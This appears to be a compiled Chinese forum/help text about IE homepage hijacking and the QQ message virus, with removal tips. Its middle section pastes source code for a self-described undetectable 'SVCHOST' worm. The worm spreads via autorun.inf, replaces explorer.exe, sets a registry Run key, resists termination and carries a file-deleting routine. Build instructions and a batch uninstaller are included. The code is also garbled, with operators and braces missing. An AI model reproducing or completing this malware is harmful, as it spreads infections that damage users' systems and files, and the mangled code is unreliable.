IE主页被修改主要有两种情况:一是仅仅被修改了注册表;二是还被安装了相关的木马病毒。如果是第一种情况,比较容易解决,修复一下注册表就可以了;对于第二种情况,一般必须要先把病毒除掉,再修复注册表和IE。
Spant在杀毒结束后(或被人为停止后)不管有没有查到毒,都会自动去修复注册表和IE(注:Spant会自动将您的IE主页设为空白页),您可以偿试用它来修复您的IE问题。最新版的Spant增强了对IE的修复能力,只需点击“杀毒”按钮即可彻底解决您的IE被不良网站恶意修改的问题。
注:关于“www.i-lookup.com”的问题可下载该网站提供的卸载工具解决:卸载“i-lookup”。
关于“http://www.portalsearching.com”的问题可以下载该网站提供的卸载工具解决:卸载“portalsearching”。
使用IE6.0SP1版的浏览器可以有效的防范不良网站对您的IE的恶意修改。
◆ 关于QQ病毒的解决方案
什么是QQ病毒
QQ病毒(也称QQ消息发送器,QQ尾巴)通常是某些不良网站用于宣传其网站的的广告程序,当您登录这些网站时这些程序就有可能在您不知觉的情况下安装到您的电脑上,在您使用QQ聊天的时候,该程序会自动在您所发的消息中添加那个网站的网址,对方可能会以为那个网址是您发给他的,如果他点击了那个网址的链接,就有可能也会中QQ病毒。该病毒还会将您的IE浏览器的主页设为他的网址。某些QQ病毒还会自动从网上下载安装另一个会定时弹出一些网页广告的木马病毒到您的电脑上。
中了QQ病毒如何清除
如果您的电脑中了QQ病毒,您只要用最新版的Spant流行病毒专杀工具杀一下毒即可解决所有问题。杀毒前请先关闭其它杀毒软件的病毒防火墙,否则可能导致Spant查不到病毒;最好也不要在杀毒时使用IE等浏览器,否则可能会有个别病毒不能清除。
某些病毒清除不掉怎么办
Spant在杀毒时可能会出现个别病毒(主要是一些病毒的dll文件)当时不能清除的情况,这时您可以偿试多杀几次,或重启后再杀一次应该就可以清除掉。如果您使用的是WinMe或WinXP系统,那么清除不掉的病毒可能是在系统还原文件夹中,请先关闭系统还原功能再杀毒,关闭系统还原功能的步骤如下:
WinMe系统:右击“我的电脑”图标,选择“属性”,在“系统属性”窗口中选择“性能”-“文件系统”-“疑难解答”,然后在“禁用系统还原”上打上勾,并“确定”,再重启计算机;
WinXP系统:右击“我的电脑”,选择“属性”,单击“系统还原”,选中“在所有驱动器上关闭系统还原”,再确定即可。
遇到最新版的Spant查不出的QQ病毒怎么办
您可以将这个QQ病毒的样本或者病毒所发的消息中的网址通过Spant的〔关于〕菜单中的联系方式通知我,我会在接到邮件后尽快对Spant进行升级。
如何彻底防范QQ病毒
由于QQ病毒主要是通过以下两种途径安装到您的电脑上的:
1.利用未打补丁的IE5.0/IE5.5/IE6.0的安全漏洞;
2.借助于其它来历不明的软件(如“藏鲸阁”等)。
所以要想防范QQ病毒,您需要做到以下两点:
1.为您的IE浏览器打上最新的补丁程序;
2.上网时对于弹出的来历不明的安装对话框不要轻易去安装它(目前主要是“藏鲸阁”等)。
强烈建议您安装最新的IE6.0SP1版本的浏览器,它可以有效的防范QQ病毒以及不良网站上的其它有害程序的入侵。
~QQ空间的皮肤代码等等会有病毒么?有病毒的代码有什么特征么 怎么检查电脑是否用代码被挂病毒?
比如用C语言做的小病毒……
功能:
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体:
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\msmouse.dll
c:\windows\system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在
explorer.exe前启动
4.修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)
5.生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。
6.连锁能力,将病毒体相连,实现相连复制更新
7.使用进程不断调用进程,使得在任务管理里无法结束病毒进程
8.不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建
9.生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下
10.附带删除文件函数(为防止危害,本函数默认不执行)
本病毒到目前为止任何杀毒软件都无法将其查杀(07年的)
本病毒单机默认使用对机器无害(破坏代码已屏蔽)
提供病毒卸载程序(保存为X.BAT,双击运行即可卸载):
@echo off
echo SK-CHINA SVCHOST KILLER 2007.6
echo WRITE BY S.K
taskkill /im mstsc32.exe /f
del c:\windows\wjview32.com
del c:\windows\explorer.exe
del c:\windows\system32\dllcache\explorer.exe
del c:\windows\system\msmouse.dll
del c:\windows\system32\cmdsys.sys
del c:\windows\system32\mstsc32.exe
del c:\svchost.com
del c:\autorun.inf
del d:\svchost.com
del d:\autorun.inf
del e:\svchost.com
del e:\autorun.inf
del f:\svchost.com
del f:\autorun.inf
del g:\svchost.com
del g:\autorun.inf
del h:\svchost.com
del h:\autorun.inf
copy c:\windows\system\explorer.exe c:\windows\explorer.exe
copy c:\windows\system\explorer.exe c:\windows\system32\dllcache\explorer.exe
del c:\windows\system\explorer.exe
echo FINISH!
echo 如果本次清除后仍残留有病毒,请再次运行本程序
pause
核心代码:(全部代码请从附件中下载,请用DEV-CPP运行其中的工程文件,编译后请将结果文件svchost.exe更名为svchost.com,否则本病毒无法发挥作用,请安心运行实验,恶意代码已屏蔽)
SK-CHINA
SVCHOST virus WRITE BY S.K
Compiler:
DEV-CPP 4.9.9.2
/* SVCHOST.C */
/* SVCHOST.EXE */
/* SVCHOST.COM */
#includestdio.h /*标准输入输出*/
#includestring.h /*字符串操作*/
#includestdlib.h /*其它函数*/
#includeprocess.h /*进程控制*/
#includedir.h /*目录函数*/
#define SVCHOST_NUM 6 /*关键位置病毒复制数量*/
#define RUBBISH_NUM 5 /*垃圾文件数量*/
#define REMOVE_NUM 5 /*删除文件数*/
文件AUTORUN.INF内容:
1.自动运行SVCHOST.com
2.覆盖默认打开命令,使用病毒体作为新的打开方式
3.覆盖默认资源管理器命令,使病毒体作为新的命令方式
char *autorun={"[AutoRun]\nopen=\"SVCHOST.com /s\"\nshell\\open=打开(O)
\nshell\\open\\Command=\"SVCHOST.com /s\"\nshell\\explore=资源管理器(X)
\nshell\\explore\\Command=\"SVCHOST.com /s\""};
添加注册表项:
1.自动运行生成病毒体C:\windows\wjview32.com
char *regadd={"REGEDIT4\n\n
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32
\"=\"C:\\\\windows\\\\wjview32.com /s\""};
函数:复制文件
复制源:infile
目的地:outfile
成功返回0,失败返回1
int copy(char *infile,char *outfile)
FILE *input,*output;
char temp;
if(strcmp(infile,outfile)!=0 ((input=fopen(infile,"rb"))!=NULL) ((output=fopen
(outfile,"wb"))!=NULL))
while(!feof(input))
fread(temp,1,1,input);
fwrite(temp,1,1,output);
fclose(input);
fclose(output);
return 0;
else return 1;
函数:通过explorer自动运行
成功返回0,失败返回1,2
int autorun_explorer()
FILE *input;
if((input=fopen("c:\\windows\\system\\explorer.exe","rb"))!=NULL)
fclose(input);
remove("c:\\windows\\$temp$");
remove("c:\\windows\\system32\\dllcache\\$temp$");
return 1;
copy("c:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");
rename("c:\\windows\\explorer.exe","c:\\windows\\$temp$");
rename("c:\\windows\\system32\\dllcache\\explorer.exe","c:\\windows\\system32
\\dllcache\\$temp$");
if(copy("SVCHOST.com","c:\\windows\\explorer.exe")==0 copy
("SVCHOST.com","c:\\windows\\system32\\dllcache\\explorer.exe")==0)
return 0;
else
return 2;
函数:添加注册表项
成功返回0,失败返回1
int add_reg()
FILE *output;
if((output=fopen("$$$$$","w"))!=NULL)
fprintf(output,regadd);
fclose(output);
spawnl(1,"c:\\windows\\regedit.exe"," /s $$$$$",NULL);
函数:复制病毒 + Autorun.inf自动运行
void copy_virus()
int i,k;
FILE *input,*output;
char *files_svchost[SVCHOST_NUM]=
{"svchost.com","c:\\windows\\wjview32.com","c:\\windows\\system\\MSMOUSE.DLL","c:\\windows\\syste
m32\\cmdsys.sys","c:\\windows\\system32\\mstsc32.exe","c:\\windows\\explorer.exe"};
char temp[2][20]={"c:\\svchost.com","c:\\autorun.inf"};
for(i=0;iSVCHOST_NUM;i++)
if((input=fopen(files_svchost[i],"rb"))!=NULL)
fclose(input);
for(k=0;kSVCHOST_NUM;k++)
copy(files_svchost[i],files_svchost[k]);
i=SVCHOST_NUM;
for(i=0;iSVCHOST_NUM;i++)
if((input=fopen(files_svchost[i],"rb"))!=NULL)
fclose(input);
for(k=0;k24;k++)
copy(files_svchost[i],temp[0]);
if((output=fopen(temp[1],"w"))!=NULL)
fprintf(output,"%s",autorun);
fclose(output);
temp[0][0]++;
temp[1][0]++;
i=SVCHOST_NUM;
函数:制造垃圾文件
void make_rubbish()
int i;
FILE *output;
srand(0);
for(i=0;iRUBBISH_NUM;i++)
int n;
char s[30];
n=rand();
sprintf(s,"C:\\DESTORY_感染_%d",n);
if((output=fopen(s,"w"))!=NULL)
fprintf(output,"%ld%s",n*n,s);
fclose(output);
函数:删除文件
void remove_files()
long done;
int i;
struct _finddata_t ffblk;
char *remove_files[3]={"*.txt","*.doc","*.xls"};
for(i=0;i3;i++)
if(_findfirst(remove_files[i],ffblk)==-1) continue;
while(!done)
remove(ffblk.name);
_findnext(done,ffblk);
_findclose(done);
主程序
使用DEV-CPP 32位C工程 实现.C程序脱离命令行界面,于后台执行
int main(int argc,char **argv)
int contral=0;
if(argc1)
if(strcmp(argv[1],"/s")==0)
goto next1;
autorun_explorer();
spawnl(1,"c:\\windows\\system\\explorer.exe",NULL);
next1:
add_reg();
copy_virus();
make_rubbish();
/* remove_files(); */
spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL);
return 0;
QQ接收到病毒,但没直接打开,而是将网址复制到地址栏打开,还会中病毒吗
你这句话就有问题。你接收到病毒,将网址复制。
病毒本身是文件,不存在复制到地址栏打开。
你指的不是病毒,是别人发给你恶意网站的网址。
恶意网站的地址复制到地址栏打开和直接打开没有区别。